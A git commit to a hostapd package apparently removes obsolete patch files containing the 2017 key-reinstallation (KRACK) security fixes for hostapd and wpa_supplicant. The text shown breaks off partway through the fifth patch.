hostapd: pkgcheck fixes

Rick Farina (Zero_Chaos) 2024-04-03 18:32:41 -04:00
parent cf637ff141
commit 90bf7fcc2c
No known key found for this signature in database
GPG key ID: A29433C0AA431DDC
45 changed files with 7 additions and 41355 deletions


@ -1,2 +1 @@
DIST hostapd-2.10.tar.gz 2440435 BLAKE2B dbeeae2f62a8ab52df3e2d05ff0467b643cd68349ef3b28814a11dfb67d4b23d14cf2461a3040694706ec614fcd7c2e0fe58f3597e877cf47296cd75e11c792f SHA512 243baa82d621f859d2507d8d5beb0ebda15a75548a62451dc9bca42717dcc8607adac49b354919a41d8257d16d07ac7268203a79750db0cfb34b51f80ff1ce8f
DIST net-wireless_hostapd_2.7-r2_extras.tar.xz 1820 BLAKE2B 5c4daf0e4fcf5ae0803cdbe2aabcc75e89b1e92048e8a01894d73639a16b049174b37eca6b6206c337a2874a6e6d5588d50fa5b8a4813e7f6c22bf02efca852f SHA512 65bc4634c8314280ceab44d1f5d6d62092f4bca48253f107b076211020f6f6502388490aee907f9910846a25ba2da7e4122bdb1873eb2b12bf94e867e3295f4c


@ -1,174 +0,0 @@
From cf4cab804c7afd5c45505528a8d16e46163243a2 Mon Sep 17 00:00:00 2001
From: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
Date: Fri, 14 Jul 2017 15:15:35 +0200
Subject: [PATCH 1/8] hostapd: Avoid key reinstallation in FT handshake
Do not reinstall TK to the driver during Reassociation Response frame
processing if the first attempt of setting the TK succeeded. This avoids
issues related to clearing the TX/RX PN that could result in reusing
same PN values for transmitted frames (e.g., due to CCM nonce reuse and
also hitting replay protection on the receiver) and accepting replayed
frames on RX side.
This issue was introduced by the commit
0e84c25434e6a1f283c7b4e62e483729085b78d2 ('FT: Fix PTK configuration in
authenticator') which allowed wpa_ft_install_ptk() to be called multiple
times with the same PTK. While the second configuration attempt is
needed with some drivers, it must be done only if the first attempt
failed.
Signed-off-by: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
---
src/ap/ieee802_11.c | 16 +++++++++++++---
src/ap/wpa_auth.c | 11 +++++++++++
src/ap/wpa_auth.h | 3 ++-
src/ap/wpa_auth_ft.c | 10 ++++++++++
src/ap/wpa_auth_i.h | 1 +
5 files changed, 37 insertions(+), 4 deletions(-)
diff --git a/src/ap/ieee802_11.c b/src/ap/ieee802_11.c
index 4e04169..333035f 100644
--- a/src/ap/ieee802_11.c
+++ b/src/ap/ieee802_11.c
@@ -1841,6 +1841,7 @@ static int add_associated_sta(struct hostapd_data *hapd,
{
struct ieee80211_ht_capabilities ht_cap;
struct ieee80211_vht_capabilities vht_cap;
+ int set = 1;
/*
* Remove the STA entry to ensure the STA PS state gets cleared and
@@ -1848,9 +1849,18 @@ static int add_associated_sta(struct hostapd_data *hapd,
* FT-over-the-DS, where a station re-associates back to the same AP but
* skips the authentication flow, or if working with a driver that
* does not support full AP client state.
+ *
+ * Skip this if the STA has already completed FT reassociation and the
+ * TK has been configured since the TX/RX PN must not be reset to 0 for
+ * the same key.
*/
- if (!sta->added_unassoc)
+ if (!sta->added_unassoc &&
+ (!(sta->flags & WLAN_STA_AUTHORIZED) ||
+ !wpa_auth_sta_ft_tk_already_set(sta->wpa_sm))) {
hostapd_drv_sta_remove(hapd, sta->addr);
+ wpa_auth_sm_event(sta->wpa_sm, WPA_DRV_STA_REMOVED);
+ set = 0;
+ }
#ifdef CONFIG_IEEE80211N
if (sta->flags & WLAN_STA_HT)
@@ -1873,11 +1883,11 @@ static int add_associated_sta(struct hostapd_data *hapd,
sta->flags & WLAN_STA_VHT ? &vht_cap : NULL,
sta->flags | WLAN_STA_ASSOC, sta->qosinfo,
sta->vht_opmode, sta->p2p_ie ? 1 : 0,
- sta->added_unassoc)) {
+ set)) {
hostapd_logger(hapd, sta->addr,
HOSTAPD_MODULE_IEEE80211, HOSTAPD_LEVEL_NOTICE,
"Could not %s STA to kernel driver",
- sta->added_unassoc ? "set" : "add");
+ set ? "set" : "add");
if (sta->added_unassoc) {
hostapd_drv_sta_remove(hapd, sta->addr);
diff --git a/src/ap/wpa_auth.c b/src/ap/wpa_auth.c
index 3587086..707971d 100644
--- a/src/ap/wpa_auth.c
+++ b/src/ap/wpa_auth.c
@@ -1745,6 +1745,9 @@ int wpa_auth_sm_event(struct wpa_state_machine *sm, enum wpa_event event)
#else /* CONFIG_IEEE80211R */
break;
#endif /* CONFIG_IEEE80211R */
+ case WPA_DRV_STA_REMOVED:
+ sm->tk_already_set = FALSE;
+ return 0;
}
#ifdef CONFIG_IEEE80211R
@@ -3250,6 +3253,14 @@ int wpa_auth_sta_wpa_version(struct wpa_state_machine *sm)
}
+int wpa_auth_sta_ft_tk_already_set(struct wpa_state_machine *sm)
+{
+ if (!sm || !wpa_key_mgmt_ft(sm->wpa_key_mgmt))
+ return 0;
+ return sm->tk_already_set;
+}
+
+
int wpa_auth_sta_clear_pmksa(struct wpa_state_machine *sm,
struct rsn_pmksa_cache_entry *entry)
{
diff --git a/src/ap/wpa_auth.h b/src/ap/wpa_auth.h
index 0de8d97..97461b0 100644
--- a/src/ap/wpa_auth.h
+++ b/src/ap/wpa_auth.h
@@ -267,7 +267,7 @@ void wpa_receive(struct wpa_authenticator *wpa_auth,
u8 *data, size_t data_len);
enum wpa_event {
WPA_AUTH, WPA_ASSOC, WPA_DISASSOC, WPA_DEAUTH, WPA_REAUTH,
- WPA_REAUTH_EAPOL, WPA_ASSOC_FT
+ WPA_REAUTH_EAPOL, WPA_ASSOC_FT, WPA_DRV_STA_REMOVED
};
void wpa_remove_ptk(struct wpa_state_machine *sm);
int wpa_auth_sm_event(struct wpa_state_machine *sm, enum wpa_event event);
@@ -280,6 +280,7 @@ int wpa_auth_pairwise_set(struct wpa_state_machine *sm);
int wpa_auth_get_pairwise(struct wpa_state_machine *sm);
int wpa_auth_sta_key_mgmt(struct wpa_state_machine *sm);
int wpa_auth_sta_wpa_version(struct wpa_state_machine *sm);
+int wpa_auth_sta_ft_tk_already_set(struct wpa_state_machine *sm);
int wpa_auth_sta_clear_pmksa(struct wpa_state_machine *sm,
struct rsn_pmksa_cache_entry *entry);
struct rsn_pmksa_cache_entry *
diff --git a/src/ap/wpa_auth_ft.c b/src/ap/wpa_auth_ft.c
index 42242a5..e63b99a 100644
--- a/src/ap/wpa_auth_ft.c
+++ b/src/ap/wpa_auth_ft.c
@@ -780,6 +780,14 @@ void wpa_ft_install_ptk(struct wpa_state_machine *sm)
return;
}
+ if (sm->tk_already_set) {
+ /* Must avoid TK reconfiguration to prevent clearing of TX/RX
+ * PN in the driver */
+ wpa_printf(MSG_DEBUG,
+ "FT: Do not re-install same PTK to the driver");
+ return;
+ }
+
/* FIX: add STA entry to kernel/driver here? The set_key will fail
* most likely without this.. At the moment, STA entry is added only
* after association has been completed. This function will be called
@@ -792,6 +800,7 @@ void wpa_ft_install_ptk(struct wpa_state_machine *sm)
/* FIX: MLME-SetProtection.Request(TA, Tx_Rx) */
sm->pairwise_set = TRUE;
+ sm->tk_already_set = TRUE;
}
@@ -898,6 +907,7 @@ static int wpa_ft_process_auth_req(struct wpa_state_machine *sm,
sm->pairwise = pairwise;
sm->PTK_valid = TRUE;
+ sm->tk_already_set = FALSE;
wpa_ft_install_ptk(sm);
buflen = 2 + sizeof(struct rsn_mdie) + 2 + sizeof(struct rsn_ftie) +
diff --git a/src/ap/wpa_auth_i.h b/src/ap/wpa_auth_i.h
index 72b7eb3..7fd8f05 100644
--- a/src/ap/wpa_auth_i.h
+++ b/src/ap/wpa_auth_i.h
@@ -65,6 +65,7 @@ struct wpa_state_machine {
struct wpa_ptk PTK;
Boolean PTK_valid;
Boolean pairwise_set;
+ Boolean tk_already_set;
int keycount;
Boolean Pair;
struct wpa_key_replay_counter {
--
2.7.4


@ -1,250 +0,0 @@
From 927f891007c402fefd1ff384645b3f07597c3ede Mon Sep 17 00:00:00 2001
From: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
Date: Wed, 12 Jul 2017 16:03:24 +0200
Subject: [PATCH 2/8] Prevent reinstallation of an already in-use group key
Track the current GTK and IGTK that is in use and when receiving a
(possibly retransmitted) Group Message 1 or WNM-Sleep Mode Response, do
not install the given key if it is already in use. This prevents an
attacker from trying to trick the client into resetting or lowering the
sequence counter associated to the group key.
Signed-off-by: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
---
src/common/wpa_common.h | 11 +++++
src/rsn_supp/wpa.c | 116 ++++++++++++++++++++++++++++++------------------
src/rsn_supp/wpa_i.h | 4 ++
3 files changed, 87 insertions(+), 44 deletions(-)
diff --git a/src/common/wpa_common.h b/src/common/wpa_common.h
index af1d0f0..d200285 100644
--- a/src/common/wpa_common.h
+++ b/src/common/wpa_common.h
@@ -217,6 +217,17 @@ struct wpa_ptk {
size_t tk_len;
};
+struct wpa_gtk {
+ u8 gtk[WPA_GTK_MAX_LEN];
+ size_t gtk_len;
+};
+
+#ifdef CONFIG_IEEE80211W
+struct wpa_igtk {
+ u8 igtk[WPA_IGTK_MAX_LEN];
+ size_t igtk_len;
+};
+#endif /* CONFIG_IEEE80211W */
/* WPA IE version 1
* 00-50-f2:1 (OUI:OUI type)
diff --git a/src/rsn_supp/wpa.c b/src/rsn_supp/wpa.c
index 3c47879..95bd7be 100644
--- a/src/rsn_supp/wpa.c
+++ b/src/rsn_supp/wpa.c
@@ -714,6 +714,15 @@ static int wpa_supplicant_install_gtk(struct wpa_sm *sm,
const u8 *_gtk = gd->gtk;
u8 gtk_buf[32];
+ /* Detect possible key reinstallation */
+ if (sm->gtk.gtk_len == (size_t) gd->gtk_len &&
+ os_memcmp(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len) == 0) {
+ wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
+ "WPA: Not reinstalling already in-use GTK to the driver (keyidx=%d tx=%d len=%d)",
+ gd->keyidx, gd->tx, gd->gtk_len);
+ return 0;
+ }
+
wpa_hexdump_key(MSG_DEBUG, "WPA: Group Key", gd->gtk, gd->gtk_len);
wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
"WPA: Installing GTK to the driver (keyidx=%d tx=%d len=%d)",
@@ -748,6 +757,9 @@ static int wpa_supplicant_install_gtk(struct wpa_sm *sm,
}
os_memset(gtk_buf, 0, sizeof(gtk_buf));
+ sm->gtk.gtk_len = gd->gtk_len;
+ os_memcpy(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len);
+
return 0;
}
@@ -854,6 +866,48 @@ static int wpa_supplicant_pairwise_gtk(struct wpa_sm *sm,
}
+#ifdef CONFIG_IEEE80211W
+static int wpa_supplicant_install_igtk(struct wpa_sm *sm,
+ const struct wpa_igtk_kde *igtk)
+{
+ size_t len = wpa_cipher_key_len(sm->mgmt_group_cipher);
+ u16 keyidx = WPA_GET_LE16(igtk->keyid);
+
+ /* Detect possible key reinstallation */
+ if (sm->igtk.igtk_len == len &&
+ os_memcmp(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len) == 0) {
+ wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
+ "WPA: Not reinstalling already in-use IGTK to the driver (keyidx=%d)",
+ keyidx);
+ return 0;
+ }
+
+ wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
+ "WPA: IGTK keyid %d pn %02x%02x%02x%02x%02x%02x",
+ keyidx, MAC2STR(igtk->pn));
+ wpa_hexdump_key(MSG_DEBUG, "WPA: IGTK", igtk->igtk, len);
+ if (keyidx > 4095) {
+ wpa_msg(sm->ctx->msg_ctx, MSG_WARNING,
+ "WPA: Invalid IGTK KeyID %d", keyidx);
+ return -1;
+ }
+ if (wpa_sm_set_key(sm, wpa_cipher_to_alg(sm->mgmt_group_cipher),
+ broadcast_ether_addr,
+ keyidx, 0, igtk->pn, sizeof(igtk->pn),
+ igtk->igtk, len) < 0) {
+ wpa_msg(sm->ctx->msg_ctx, MSG_WARNING,
+ "WPA: Failed to configure IGTK to the driver");
+ return -1;
+ }
+
+ sm->igtk.igtk_len = len;
+ os_memcpy(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len);
+
+ return 0;
+}
+#endif /* CONFIG_IEEE80211W */
+
+
static int ieee80211w_set_keys(struct wpa_sm *sm,
struct wpa_eapol_ie_parse *ie)
{
@@ -864,30 +918,14 @@ static int ieee80211w_set_keys(struct wpa_sm *sm,
if (ie->igtk) {
size_t len;
const struct wpa_igtk_kde *igtk;
- u16 keyidx;
+
len = wpa_cipher_key_len(sm->mgmt_group_cipher);
if (ie->igtk_len != WPA_IGTK_KDE_PREFIX_LEN + len)
return -1;
+
igtk = (const struct wpa_igtk_kde *) ie->igtk;
- keyidx = WPA_GET_LE16(igtk->keyid);
- wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG, "WPA: IGTK keyid %d "
- "pn %02x%02x%02x%02x%02x%02x",
- keyidx, MAC2STR(igtk->pn));
- wpa_hexdump_key(MSG_DEBUG, "WPA: IGTK",
- igtk->igtk, len);
- if (keyidx > 4095) {
- wpa_msg(sm->ctx->msg_ctx, MSG_WARNING,
- "WPA: Invalid IGTK KeyID %d", keyidx);
- return -1;
- }
- if (wpa_sm_set_key(sm, wpa_cipher_to_alg(sm->mgmt_group_cipher),
- broadcast_ether_addr,
- keyidx, 0, igtk->pn, sizeof(igtk->pn),
- igtk->igtk, len) < 0) {
- wpa_msg(sm->ctx->msg_ctx, MSG_WARNING,
- "WPA: Failed to configure IGTK to the driver");
+ if (wpa_supplicant_install_igtk(sm, igtk) < 0)
return -1;
- }
}
return 0;
@@ -2307,7 +2345,7 @@ void wpa_sm_deinit(struct wpa_sm *sm)
*/
void wpa_sm_notify_assoc(struct wpa_sm *sm, const u8 *bssid)
{
- int clear_ptk = 1;
+ int clear_keys = 1;
if (sm == NULL)
return;
@@ -2333,11 +2371,11 @@ void wpa_sm_notify_assoc(struct wpa_sm *sm, const u8 *bssid)
/* Prepare for the next transition */
wpa_ft_prepare_auth_request(sm, NULL);
- clear_ptk = 0;
+ clear_keys = 0;
}
#endif /* CONFIG_IEEE80211R */
- if (clear_ptk) {
+ if (clear_keys) {
/*
* IEEE 802.11, 8.4.10: Delete PTK SA on (re)association if
* this is not part of a Fast BSS Transition.
@@ -2347,6 +2385,10 @@ void wpa_sm_notify_assoc(struct wpa_sm *sm, const u8 *bssid)
os_memset(&sm->ptk, 0, sizeof(sm->ptk));
sm->tptk_set = 0;
os_memset(&sm->tptk, 0, sizeof(sm->tptk));
+ os_memset(&sm->gtk, 0, sizeof(sm->gtk));
+#ifdef CONFIG_IEEE80211W
+ os_memset(&sm->igtk, 0, sizeof(sm->igtk));
+#endif /* CONFIG_IEEE80211W */
}
#ifdef CONFIG_TDLS
@@ -2877,6 +2919,10 @@ void wpa_sm_drop_sa(struct wpa_sm *sm)
os_memset(sm->pmk, 0, sizeof(sm->pmk));
os_memset(&sm->ptk, 0, sizeof(sm->ptk));
os_memset(&sm->tptk, 0, sizeof(sm->tptk));
+ os_memset(&sm->gtk, 0, sizeof(sm->gtk));
+#ifdef CONFIG_IEEE80211W
+ os_memset(&sm->igtk, 0, sizeof(sm->igtk));
+#endif /* CONFIG_IEEE80211W */
#ifdef CONFIG_IEEE80211R
os_memset(sm->xxkey, 0, sizeof(sm->xxkey));
os_memset(sm->pmk_r0, 0, sizeof(sm->pmk_r0));
@@ -2949,29 +2995,11 @@ int wpa_wnmsleep_install_key(struct wpa_sm *sm, u8 subelem_id, u8 *buf)
os_memset(&gd, 0, sizeof(gd));
#ifdef CONFIG_IEEE80211W
} else if (subelem_id == WNM_SLEEP_SUBELEM_IGTK) {
- struct wpa_igtk_kde igd;
- u16 keyidx;
-
- os_memset(&igd, 0, sizeof(igd));
- keylen = wpa_cipher_key_len(sm->mgmt_group_cipher);
- os_memcpy(igd.keyid, buf + 2, 2);
- os_memcpy(igd.pn, buf + 4, 6);
-
- keyidx = WPA_GET_LE16(igd.keyid);
- os_memcpy(igd.igtk, buf + 10, keylen);
-
- wpa_hexdump_key(MSG_DEBUG, "Install IGTK (WNM SLEEP)",
- igd.igtk, keylen);
- if (wpa_sm_set_key(sm, wpa_cipher_to_alg(sm->mgmt_group_cipher),
- broadcast_ether_addr,
- keyidx, 0, igd.pn, sizeof(igd.pn),
- igd.igtk, keylen) < 0) {
- wpa_printf(MSG_DEBUG, "Failed to install the IGTK in "
- "WNM mode");
- os_memset(&igd, 0, sizeof(igd));
+ const struct wpa_igtk_kde *igtk;
+
+ igtk = (const struct wpa_igtk_kde *) (buf + 2);
+ if (wpa_supplicant_install_igtk(sm, igtk) < 0)
return -1;
- }
- os_memset(&igd, 0, sizeof(igd));
#endif /* CONFIG_IEEE80211W */
} else {
wpa_printf(MSG_DEBUG, "Unknown element id");
diff --git a/src/rsn_supp/wpa_i.h b/src/rsn_supp/wpa_i.h
index f653ba6..afc9e37 100644
--- a/src/rsn_supp/wpa_i.h
+++ b/src/rsn_supp/wpa_i.h
@@ -31,6 +31,10 @@ struct wpa_sm {
u8 rx_replay_counter[WPA_REPLAY_COUNTER_LEN];
int rx_replay_counter_set;
u8 request_counter[WPA_REPLAY_COUNTER_LEN];
+ struct wpa_gtk gtk;
+#ifdef CONFIG_IEEE80211W
+ struct wpa_igtk igtk;
+#endif /* CONFIG_IEEE80211W */
struct eapol_sm *eapol; /* EAPOL state machine from upper level code */
--
2.7.4


@ -1,184 +0,0 @@
From 8280294e74846ea342389a0cd17215050fa5afe8 Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Sun, 1 Oct 2017 12:12:24 +0300
Subject: [PATCH 3/8] Extend protection of GTK/IGTK reinstallation of WNM-Sleep
Mode cases
This extends the protection to track last configured GTK/IGTK value
separately from EAPOL-Key frames and WNM-Sleep Mode frames to cover a
corner case where these two different mechanisms may get used when the
GTK/IGTK has changed and tracking a single value is not sufficient to
detect a possible key reconfiguration.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/rsn_supp/wpa.c | 53 +++++++++++++++++++++++++++++++++++++---------------
src/rsn_supp/wpa_i.h | 2 ++
2 files changed, 40 insertions(+), 15 deletions(-)
diff --git a/src/rsn_supp/wpa.c b/src/rsn_supp/wpa.c
index 95bd7be..7a2c68d 100644
--- a/src/rsn_supp/wpa.c
+++ b/src/rsn_supp/wpa.c
@@ -709,14 +709,17 @@ struct wpa_gtk_data {
static int wpa_supplicant_install_gtk(struct wpa_sm *sm,
const struct wpa_gtk_data *gd,
- const u8 *key_rsc)
+ const u8 *key_rsc, int wnm_sleep)
{
const u8 *_gtk = gd->gtk;
u8 gtk_buf[32];
/* Detect possible key reinstallation */
- if (sm->gtk.gtk_len == (size_t) gd->gtk_len &&
- os_memcmp(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len) == 0) {
+ if ((sm->gtk.gtk_len == (size_t) gd->gtk_len &&
+ os_memcmp(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len) == 0) ||
+ (sm->gtk_wnm_sleep.gtk_len == (size_t) gd->gtk_len &&
+ os_memcmp(sm->gtk_wnm_sleep.gtk, gd->gtk,
+ sm->gtk_wnm_sleep.gtk_len) == 0)) {
wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
"WPA: Not reinstalling already in-use GTK to the driver (keyidx=%d tx=%d len=%d)",
gd->keyidx, gd->tx, gd->gtk_len);
@@ -757,8 +760,14 @@ static int wpa_supplicant_install_gtk(struct wpa_sm *sm,
}
os_memset(gtk_buf, 0, sizeof(gtk_buf));
- sm->gtk.gtk_len = gd->gtk_len;
- os_memcpy(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len);
+ if (wnm_sleep) {
+ sm->gtk_wnm_sleep.gtk_len = gd->gtk_len;
+ os_memcpy(sm->gtk_wnm_sleep.gtk, gd->gtk,
+ sm->gtk_wnm_sleep.gtk_len);
+ } else {
+ sm->gtk.gtk_len = gd->gtk_len;
+ os_memcpy(sm->gtk.gtk, gd->gtk, sm->gtk.gtk_len);
+ }
return 0;
}
@@ -852,7 +861,7 @@ static int wpa_supplicant_pairwise_gtk(struct wpa_sm *sm,
(wpa_supplicant_check_group_cipher(sm, sm->group_cipher,
gtk_len, gtk_len,
&gd.key_rsc_len, &gd.alg) ||
- wpa_supplicant_install_gtk(sm, &gd, key_rsc))) {
+ wpa_supplicant_install_gtk(sm, &gd, key_rsc, 0))) {
wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
"RSN: Failed to install GTK");
os_memset(&gd, 0, sizeof(gd));
@@ -868,14 +877,18 @@ static int wpa_supplicant_pairwise_gtk(struct wpa_sm *sm,
#ifdef CONFIG_IEEE80211W
static int wpa_supplicant_install_igtk(struct wpa_sm *sm,
- const struct wpa_igtk_kde *igtk)
+ const struct wpa_igtk_kde *igtk,
+ int wnm_sleep)
{
size_t len = wpa_cipher_key_len(sm->mgmt_group_cipher);
u16 keyidx = WPA_GET_LE16(igtk->keyid);
/* Detect possible key reinstallation */
- if (sm->igtk.igtk_len == len &&
- os_memcmp(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len) == 0) {
+ if ((sm->igtk.igtk_len == len &&
+ os_memcmp(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len) == 0) ||
+ (sm->igtk_wnm_sleep.igtk_len == len &&
+ os_memcmp(sm->igtk_wnm_sleep.igtk, igtk->igtk,
+ sm->igtk_wnm_sleep.igtk_len) == 0)) {
wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
"WPA: Not reinstalling already in-use IGTK to the driver (keyidx=%d)",
keyidx);
@@ -900,8 +913,14 @@ static int wpa_supplicant_install_igtk(struct wpa_sm *sm,
return -1;
}
- sm->igtk.igtk_len = len;
- os_memcpy(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len);
+ if (wnm_sleep) {
+ sm->igtk_wnm_sleep.igtk_len = len;
+ os_memcpy(sm->igtk_wnm_sleep.igtk, igtk->igtk,
+ sm->igtk_wnm_sleep.igtk_len);
+ } else {
+ sm->igtk.igtk_len = len;
+ os_memcpy(sm->igtk.igtk, igtk->igtk, sm->igtk.igtk_len);
+ }
return 0;
}
@@ -924,7 +943,7 @@ static int ieee80211w_set_keys(struct wpa_sm *sm,
return -1;
igtk = (const struct wpa_igtk_kde *) ie->igtk;
- if (wpa_supplicant_install_igtk(sm, igtk) < 0)
+ if (wpa_supplicant_install_igtk(sm, igtk, 0) < 0)
return -1;
}
@@ -1574,7 +1593,7 @@ static void wpa_supplicant_process_1_of_2(struct wpa_sm *sm,
if (wpa_supplicant_rsc_relaxation(sm, key->key_rsc))
key_rsc = null_rsc;
- if (wpa_supplicant_install_gtk(sm, &gd, key_rsc) ||
+ if (wpa_supplicant_install_gtk(sm, &gd, key_rsc, 0) ||
wpa_supplicant_send_2_of_2(sm, key, ver, key_info) < 0)
goto failed;
os_memset(&gd, 0, sizeof(gd));
@@ -2386,8 +2405,10 @@ void wpa_sm_notify_assoc(struct wpa_sm *sm, const u8 *bssid)
sm->tptk_set = 0;
os_memset(&sm->tptk, 0, sizeof(sm->tptk));
os_memset(&sm->gtk, 0, sizeof(sm->gtk));
+ os_memset(&sm->gtk_wnm_sleep, 0, sizeof(sm->gtk_wnm_sleep));
#ifdef CONFIG_IEEE80211W
os_memset(&sm->igtk, 0, sizeof(sm->igtk));
+ os_memset(&sm->igtk_wnm_sleep, 0, sizeof(sm->igtk_wnm_sleep));
#endif /* CONFIG_IEEE80211W */
}
@@ -2920,8 +2941,10 @@ void wpa_sm_drop_sa(struct wpa_sm *sm)
os_memset(&sm->ptk, 0, sizeof(sm->ptk));
os_memset(&sm->tptk, 0, sizeof(sm->tptk));
os_memset(&sm->gtk, 0, sizeof(sm->gtk));
+ os_memset(&sm->gtk_wnm_sleep, 0, sizeof(sm->gtk_wnm_sleep));
#ifdef CONFIG_IEEE80211W
os_memset(&sm->igtk, 0, sizeof(sm->igtk));
+ os_memset(&sm->igtk_wnm_sleep, 0, sizeof(sm->igtk_wnm_sleep));
#endif /* CONFIG_IEEE80211W */
#ifdef CONFIG_IEEE80211R
os_memset(sm->xxkey, 0, sizeof(sm->xxkey));
@@ -2986,7 +3009,7 @@ int wpa_wnmsleep_install_key(struct wpa_sm *sm, u8 subelem_id, u8 *buf)
wpa_hexdump_key(MSG_DEBUG, "Install GTK (WNM SLEEP)",
gd.gtk, gd.gtk_len);
- if (wpa_supplicant_install_gtk(sm, &gd, key_rsc)) {
+ if (wpa_supplicant_install_gtk(sm, &gd, key_rsc, 1)) {
os_memset(&gd, 0, sizeof(gd));
wpa_printf(MSG_DEBUG, "Failed to install the GTK in "
"WNM mode");
@@ -2998,7 +3021,7 @@ int wpa_wnmsleep_install_key(struct wpa_sm *sm, u8 subelem_id, u8 *buf)
const struct wpa_igtk_kde *igtk;
igtk = (const struct wpa_igtk_kde *) (buf + 2);
- if (wpa_supplicant_install_igtk(sm, igtk) < 0)
+ if (wpa_supplicant_install_igtk(sm, igtk, 1) < 0)
return -1;
#endif /* CONFIG_IEEE80211W */
} else {
diff --git a/src/rsn_supp/wpa_i.h b/src/rsn_supp/wpa_i.h
index afc9e37..9a54631 100644
--- a/src/rsn_supp/wpa_i.h
+++ b/src/rsn_supp/wpa_i.h
@@ -32,8 +32,10 @@ struct wpa_sm {
int rx_replay_counter_set;
u8 request_counter[WPA_REPLAY_COUNTER_LEN];
struct wpa_gtk gtk;
+ struct wpa_gtk gtk_wnm_sleep;
#ifdef CONFIG_IEEE80211W
struct wpa_igtk igtk;
+ struct wpa_igtk igtk_wnm_sleep;
#endif /* CONFIG_IEEE80211W */
struct eapol_sm *eapol; /* EAPOL state machine from upper level code */
--
2.7.4


@ -1,79 +0,0 @@
From 8f82bc94e8697a9d47fa8774dfdaaede1084912c Mon Sep 17 00:00:00 2001
From: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
Date: Fri, 29 Sep 2017 04:22:51 +0200
Subject: [PATCH 4/8] Prevent installation of an all-zero TK
Properly track whether a PTK has already been installed to the driver
and the TK part cleared from memory. This prevents an attacker from
trying to trick the client into installing an all-zero TK.
This fixes the earlier fix in commit
ad00d64e7d8827b3cebd665a0ceb08adabf15e1e ('Fix TK configuration to the
driver in EAPOL-Key 3/4 retry case') which did not take into account
possibility of an extra message 1/4 showing up between retries of
message 3/4.
Signed-off-by: Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
---
src/common/wpa_common.h | 1 +
src/rsn_supp/wpa.c | 5 ++---
src/rsn_supp/wpa_i.h | 1 -
3 files changed, 3 insertions(+), 4 deletions(-)
diff --git a/src/common/wpa_common.h b/src/common/wpa_common.h
index d200285..1021ccb 100644
--- a/src/common/wpa_common.h
+++ b/src/common/wpa_common.h
@@ -215,6 +215,7 @@ struct wpa_ptk {
size_t kck_len;
size_t kek_len;
size_t tk_len;
+ int installed; /* 1 if key has already been installed to driver */
};
struct wpa_gtk {
diff --git a/src/rsn_supp/wpa.c b/src/rsn_supp/wpa.c
index 7a2c68d..0550a41 100644
--- a/src/rsn_supp/wpa.c
+++ b/src/rsn_supp/wpa.c
@@ -510,7 +510,6 @@ static void wpa_supplicant_process_1_of_4(struct wpa_sm *sm,
os_memset(buf, 0, sizeof(buf));
}
sm->tptk_set = 1;
- sm->tk_to_set = 1;
kde = sm->assoc_wpa_ie;
kde_len = sm->assoc_wpa_ie_len;
@@ -615,7 +614,7 @@ static int wpa_supplicant_install_ptk(struct wpa_sm *sm,
enum wpa_alg alg;
const u8 *key_rsc;
- if (!sm->tk_to_set) {
+ if (sm->ptk.installed) {
wpa_dbg(sm->ctx->msg_ctx, MSG_DEBUG,
"WPA: Do not re-install same PTK to the driver");
return 0;
@@ -659,7 +658,7 @@ static int wpa_supplicant_install_ptk(struct wpa_sm *sm,
/* TK is not needed anymore in supplicant */
os_memset(sm->ptk.tk, 0, WPA_TK_MAX_LEN);
- sm->tk_to_set = 0;
+ sm->ptk.installed = 1;
if (sm->wpa_ptk_rekey) {
eloop_cancel_timeout(wpa_sm_rekey_ptk, sm, NULL);
diff --git a/src/rsn_supp/wpa_i.h b/src/rsn_supp/wpa_i.h
index 9a54631..41f371f 100644
--- a/src/rsn_supp/wpa_i.h
+++ b/src/rsn_supp/wpa_i.h
@@ -24,7 +24,6 @@ struct wpa_sm {
struct wpa_ptk ptk, tptk;
int ptk_set, tptk_set;
unsigned int msg_3_of_4_ok:1;
- unsigned int tk_to_set:1;
u8 snonce[WPA_NONCE_LEN];
u8 anonce[WPA_NONCE_LEN]; /* ANonce from the last 1/4 msg */
int renew_snonce;
--
2.7.4


@ -1,64 +0,0 @@
From 12fac09b437a1dc8a0f253e265934a8aaf4d2f8b Mon Sep 17 00:00:00 2001
From: Jouni Malinen <j@w1.fi>
Date: Sun, 1 Oct 2017 12:32:57 +0300
Subject: [PATCH 5/8] Fix PTK rekeying to generate a new ANonce
The Authenticator state machine path for PTK rekeying ended up bypassing
the AUTHENTICATION2 state where a new ANonce is generated when going
directly to the PTKSTART state since there is no need to try to
determine the PMK again in such a case. This is far from ideal since the
new PTK would depend on a new nonce only from the supplicant.
Fix this by generating a new ANonce when moving to the PTKSTART state
for the purpose of starting new 4-way handshake to rekey PTK.
Signed-off-by: Jouni Malinen <j@w1.fi>
---
src/ap/wpa_auth.c | 24 +++++++++++++++++++++---
1 file changed, 21 insertions(+), 3 deletions(-)
diff --git a/src/ap/wpa_auth.c b/src/ap/wpa_auth.c
index 707971d..bf10cc1 100644
--- a/src/ap/wpa_auth.c
+++ b/src/ap/wpa_auth.c
@@ -1901,6 +1901,21 @@ SM_STATE(WPA_PTK, AUTHENTICATION2)
}
+static int wpa_auth_sm_ptk_update(struct wpa_state_machine *sm)
